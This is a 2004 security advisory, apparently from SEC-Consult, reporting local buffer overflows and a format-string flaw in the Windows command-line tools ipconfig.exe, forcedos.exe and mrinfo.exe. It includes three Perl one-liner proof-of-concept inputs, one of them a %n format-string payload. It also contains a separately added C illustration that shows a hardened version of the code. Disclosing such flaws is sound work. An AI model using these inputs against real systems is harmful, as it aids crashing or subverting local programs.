Message-ID: <20041117090236.036773c2.m.eiszner@sec-consult.com>
From: m.eiszner at sec-consult.com (Martin Eiszner)
Subject: Microsoft Windows cmd line tools BOFs

========================================
Microsoft command-line tools BOFs
========================================

Product:        Windows-2000 SP4 / Windows-XP SP2

Vulnerabilities:

- Buffer Overflow (no privilege escalation)

Vendor:         Microsoft (http://www.microsoft.com/)
Vendor-Status:  vendor contacted (between 2002 and 2003)
Vendor-Patches: ipconfig.exe (fixed in XP SP2) / forcedos.exe and mrinfo.exe: no patch available

Objects:        ipconfig.exe / forcedos.exe / mrinfo.exe

Exploitable:
Local:          PARTIAL
Remote:         NO

============
Introduction
============

---

=====================
Vulnerability Details
=====================

1) LOCAL BUFFER OVERFLOWS / FORMAT STRING VULNERABILITY
=======================================================

OBJECTS:
ipconfig.exe (only Windows-2000 SP4)
forcedos.exe
mrinfo.exe

DESCRIPTION:
Insufficient input validation leads to a) stack-based buffer overflows and b) format string vulnerabilities.

EXAMPLES:

a) ipconfig.exe /`perl -e 'print "PAAAA\x44\x33\x22\x11","%08x"x13,"%n";'`
b) forcedos.exe `perl -e 'print "A"x6784;'`
c) mrinfo.exe -i `perl -e 'print "A"x60;'`
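The two defects named in the description and exercised by the examples above, as an added illustration in C (not the advisory's or Microsoft's code): the unsafe pattern appears only as a comment, while the hardened handler rejects an overlong argument before any copy and never passes the argument as a format string. The names handle_interface_arg, format_report and the bound IFNAME_MAX are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>
/* The unsafe pattern the advisory describes, kept as a comment so it is
 * never compiled (hypothetical, not Microsoft's code):
 *
 *   char name[32];
 *   strcpy(name, arg);   // (b) no bound: an overlong argument overwrites the stack
 *   printf(arg);         // (a) the argument itself becomes the format string,
 *                        //     so "%08x" and "%n" inside it are interpreted
 */
#define IFNAME_MAX 32   /* hypothetical bound for an interface-name argument */

/* Hardened argument handler: returns 0 and fills `out` on success, -1 if the
 * argument is empty or does not fit. The length is checked before any copy. */
int handle_interface_arg(const char *arg, char *out, size_t outlen)
{
    if (arg == NULL || outlen == 0)
        return -1;
    size_t n = strlen(arg);
    if (n == 0 || n >= outlen)        /* reject overlong input instead of truncating */
        return -1;
    memcpy(out, arg, n + 1);          /* bounded: n < outlen was just checked */
    return 0;
}

/* Builds the message a tool would print. The argument is only ever passed as
 * data via "%s", never as the format, so '%' sequences in it stay inert.
 * Returns the length snprintf() reports for the message. */
int format_report(const char *arg, char *msg, size_t msglen)
{
    char name[IFNAME_MAX];
    if (handle_interface_arg(arg, name, sizeof name) != 0)
        return snprintf(msg, msglen, "invalid interface argument (max %d bytes)",
                        IFNAME_MAX - 1);
    return snprintf(msg, msglen, "interface: %s", name);
}

int main(void)
{
    /* constructed inputs mirroring the advisory's test strings */
    const char *samples[] = { "eth0", "%08x%08x%08x%n",
        "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" };
    char msg[128];
    for (int i = 0; i < 3; i++) {
        format_report(samples[i], msg, sizeof msg);
        puts(msg);
    }
    return 0;
}
```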

===============
GENERAL REMARKS
===============

Related postings on this issue: http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2004-10/0065.html

It is unlikely that an attacker can gain access or elevate privileges through "forcedos.exe" and "mrinfo.exe".

Nevertheless, it might be possible to misuse "ipconfig.exe" in a "restricted" environment with DHCP enabled !!


====================
Recommended Hotfixes
====================

---

EOF @2003 Brereton_paul@...nternet.com, m.eiszner@...-consult.com


=======
Contact
=======

SEC-CONSULT
UK / EUROPE
Austria / EUROPE

Brereton_paul@...nternet.com
m.eiszner@...-consult.com


